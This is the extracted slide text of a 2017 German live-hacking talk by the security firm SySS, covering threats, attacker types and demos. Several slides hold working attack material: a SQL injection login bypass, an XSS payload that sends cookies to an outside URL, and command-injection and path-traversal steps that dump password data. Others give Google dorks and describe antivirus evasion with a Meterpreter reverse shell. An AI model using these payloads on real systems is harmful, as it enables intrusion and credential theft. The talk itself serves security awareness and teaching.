View
2
Download
0
Category
Preview:
Citation preview
13.06.2017 Seite 1
SySS GmbH
Dipl.-Inform. Sebastian Schreiber
Managing Director
+49 7071 - 407856 0
Sebastian.Schreiber@SySS.de
LIVE-HACKING 16:00-17:00 UHR
13.06.2017 Seite 2
SySS GmbH
Live Hacking
1.DoS-Attacke gegen Server
2.Funktastaturen, Mäuse, Presenter
3.Angriff gegen Funk-Alarmanlagen
4.USB-Angriffe / neue Spionagewerkzeuge
5.Mobile App / Webservice hacken
6.Android Trojaner
7.Angriffe auf Antivirus
8.USB-Krypto-Angriff
9.SMS fälschen
13.06.2017 Seite 3
SySS GmbH
21.03.16
Seite 3
SySS GmbH
Die SySS GmbH 1998: Gründung der SySS GmbH
Heute: 95 Festangestellte + 2 Extern
Sitz in Tübingen, inhabergeführt
Weltweit tätig, Fokus liegt auf Deutschland
Seit Juli 2009 in eigenem Bürogebäude, ab Mai 2017 im
neuen SySS Campus.
Dienstleistungen:
Penetration Testing & Sicherheitsanalysen (95%)
Incident Response/Schulungen/Auftritte (5%)
13.06.2017 Seite 4
SySS GmbH
Bedrohungslage – Rückblick 2016
01-2016: „Cyber-Sicherheit: Die Hackerdämmerung. Ein Stromausfall in der Ukraine
könnte durch einen Cyber-Angriff ausgelöst worden sein. Es wäre das erste Mal,
dass ein Stromnetz über das Internet lahmgelegt wurde“ – Frankfurter Allgemeine
02-2016: „Ransomware-Virus legt Krankenhaus lahm: Ein Computervirus hat die IT
des Lukaskrankenhauses in Neuss infiziert“ – heise.de
04-2016: „Computervirus in bayerischem Atomkraftwerk entdeckt“ – Die Zeit
05-2016: „Cyber-Spionage-Angriff auf Ruag: Mehr als 20 Gigabyte Daten entwendet“
– Neue Zürcher Zeitung
05-2016: „Swift: Hacker attackieren schon wieder zentrales Banken-Netzwerk“ –
Süddeutsche Zeitung
10-2016: „DDoS-Attacke: Der Angriff, der aus dem Kühlschrank kam. Ein Angriff über
vernetzte Haushaltsgeräte sorgte dafür, dass Dienste wie Spotify und Netflix nicht
mehr erreichbar waren“ Die Zeit
12-2016: „Yahoo muss erneut Massenhack beichten: Eine Milliarde Opfer“ –
heise.de
13.06.2017 Seite 5
SySS GmbH
Agenda 1. DOS attack against internet web server
2. SMS (or SMTP) spoofing and identity theft
3. Attack against Canon camera
4. Attacking mobile Apps and web services (Quizzduell)
5. Attacks against krypto devices
6. Smartphone trojan / SIM bug
7. SQL Injection
8. Evading anti virus
9. USB attacks with different devices
13.06.2017 Seite 9
SySS GmbH
Nur diese Fälle werden öffentlich bekannt.
Täterprofile
Know How
Neugierige Studenten
Industriespione Geheimdienste
kriminelle Energie
klassische Hacker
Script Kiddies
klassische Innentäter
kriminelle Hacker
13.06.2017 Seite 10
SySS GmbH
Google Hacking
• Filetype:sql phpmyadmin wp_users
• inurl:warenkorb inurl:preis
13.06.2017 Seite 11
SySS GmbH
LiveHack Hotel
• peter/peter
• http://www.live-hack.de/xss/xss.php
• Admin / passwort
13.06.2017 Seite 13
SySS GmbH
SQL Injection in
Login-Formularen
•SELECT * FROM users WHERE user='peter' AND
password='peter'
peter' OR 1=1#
SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter'
13.06.2017 Seite 14
SySS GmbH
DOS
• http://www.live-hack.de/clock.php
• Angriff: /home/livehack/thc/run.sh
13.06.2017 Seite 15
SySS GmbH
Antivirus Evasion
Funktionsweise von Antivirensoftware:
• Blacklisting
• Whitelisting
Blacklisting-Methoden: Funktionsweise und Schwächen
• signaturbasiert
• Suche nach bekannten Mustern
• unbekannte Schadsoftware kann nicht erkannt werden
• Polymorphie von Schadsoftware wird seit langem ausgenutzt, um signaturbasierte Erkennung zu umgehen
• verhaltensbasiert
• Klassifikation von Programmen in gut- oder bösartig anhand deren Verhaltens
• üblicherweise regelbasierte Techniken in Kombination mit einem Scoring-Verfahren und festgelegten Schwellenwerten für berechnete Scores (heuristisches Verfahren)
• statische Codeanalyse
• Es kann nur der Programmcode anaysiert werden, der innerhalb der ausführbaren Datei unmittelbar zugreifbar ist.
• dynamische Codeanalyse zur Laufzeit (Sanbox-Umgebung)
• diverse Einschränkungen der Sandbox-Umgebung (z. B. Zeit, bestimmte Benutzeraktionen [Mausklick, etc.])
15
13.06.2017 Seite 16
SySS GmbH
Antivirus Evasion:
Live Demonstration
• Kostenloser Schutz vor Schadsoftware für Heimanwender und
Kleinunternehmen
• Nutzt dieselbe Technologie und Scan-Engine wie System Center 2012 Endpoint Protection (früher Forefront Endpoint Protection)
Beispiel für Antivirensoftware: Microsoft Security
Essentials
• Einsatz der folgenden Antivirus-Evasion-Techniken:
• Polymorphie
• Verschlüsselung + Kompression
• Erkennung von Sandbox-Umgebungen (Sandbox Detection)
• Schadcode: Meterpreter-Shell (windows/meterpreter/reverse_https) des Metasploit Framework
Erstellen einer ausführbaren Datei mit bekanntem Schadcode unter Verwendung des
Software-Tools ShCoLo der SySS GmbH
16
13.06.2017 Seite 17
SySS GmbH
Antivirus Evasion: Testergebnisse
17
Produktname Version Datum der
Virendefinitionsda
tei
Betriebssystem(e) des
Zielsystems
Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit)
Windows 7 SP 1 (64 Bit)
AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit)
Kaspersky Endpoint
Protection Workstation
8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit)
McAfee SaaS Endpoint
Protection
5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit)
Microsoft Security
Essentials
4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit)
Sophos Endpoint Security
and Control
10.2 21.05.2013 Windows XP SP 3 (32 Bit)
Symantec Endpoint
Protection
12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)
13.06.2017 Seite 18
SySS GmbH
Mobile phone
trojan • Symbian phone:
• 0049-177-6397937
• SMS forwarding
• activate the microphone
• Reboot
• Location info
18
13.06.2017 Seite 21
SySS GmbH
XSS
• <script>window.open('http://www.syss.
de/cookie.html?'+document.cookie)</s
cript>
21
13.06.2017 Seite 22
SySS GmbH
NSA-Affäre
von 2013 •Bis 2013
•„Experten ahnen, dass E-Mails abgehört
werden“
(„Spook“ in Mailprogrammen seit 15 Jahren)
•Ab 2013 Gesichertes Wissen:
1.Telefonate werden abgehört
2.SMS/Telefonate werden abgehört
3.Die NSA beeinflusst Krypto-Standards
4.Alle Handy-Hersteller arbeiten mit der NSA
zusammen
22
13.06.2017 Seite 26
SySS GmbH
Schutz gegen PRISM,
Tempora, KeyScore
Für den Einzelnen:
• Abstinenz: Vermeidung elektronischer Kommunikation
• Bewusstsein
• Chiffrierung
• Distanzierung von amerikanischen Betriebssystemen (Android, Microsoft, Apple) und Diensten (Facebook, Gmail, iCloud)
Für uns Bürger: Neue Gesetze
• Haftung für SW-Hersteller und Cloud-Anbieter
• ADV muss auch beim Einsatz von Software gelten.
13.06.2017 Seite 27
SySS GmbH
Injections, PHP Magic Quotes
1) http://livehack.syss.de/infoboard/index.php?mod=search
2) Suche nach z.B. SySS
3) Suche nach !"§$%&/()=?`‘‚
4) Conclusio: PHP Magic Quotes
5) Suche nach SySS $(sleep 4)
6) $(grep -r -i password * > /tmp/passwd)
7) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/passwd
8) Suchen nach $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt)
9) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/userdata.txt
13.06.2017 Seite 33
SySS GmbH
SySS GmbH – einige Fakten (1)
Gegründet 1998 durch Sebastian Schreiber
70 Festangestellte + 2 Externe (Stand Juli 2015)
Sitz in Tübingen
Weltweit tätig
Seit Juli 2009 in eigenem Bürogebäude
Seit Juli 2015 zugemietetes Büro
Ab Dezember 2016: Bezug zweites, neues Gebäude.
Gründung
Größe
Neckar
Weltweit
Neubau
13.06.2017 Seite 38
SySS GmbH
SySS auf Konferenzen im Q4
• Hack.lu in Luxemburg
• Hacktivity in Budapest
• Handelsblatt Cyber in Berlin
• Ruxcon in Melburne
• DeepSec in Wien
• ZeroNights in Moskau
• 2017: Positive Hacking Days in Moskau
Recommended